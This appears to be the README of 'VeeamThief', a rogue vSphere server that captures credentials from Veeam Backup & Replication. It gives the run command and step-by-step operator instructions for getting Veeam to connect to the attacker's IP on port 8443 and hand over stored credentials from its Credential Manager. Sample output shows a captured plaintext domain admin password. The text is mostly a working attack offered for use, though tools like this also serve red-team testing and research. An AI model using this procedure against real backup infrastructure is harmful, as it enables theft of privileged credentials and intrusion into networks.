Rogue vSphere server for capturing Veeam Backup & Replication credentials.
sudo python3 VeeamThief.py [-p <port>]In Veeam: Add Server → VMware vSphere → enter attacker IP:8443 → accept cert → choose creds to use from Veeam Credential Manager → capture plaintext creds on listener.
▖▖ ▄▖▌ ▘ ▐▘
▌▌█▌█▌▀▌▛▛▌▐ ▛▌▌█▌▜▘
▚▘▙▖▙▖█▌▌▌▌▐ ▌▌▌▙▖▐
[*] Listening on port 8443
[*] Connection from 192.168.15.50
==================================================
CREDENTIALS CAPTURED
==================================================
Username : ecorp.locl\veeam-admin
Password : B@ckupP@ssw0rd
==================================================
Based on research by @sadshade. Updated for Veeam v12+ which requires RetrieveInternalContent API responses.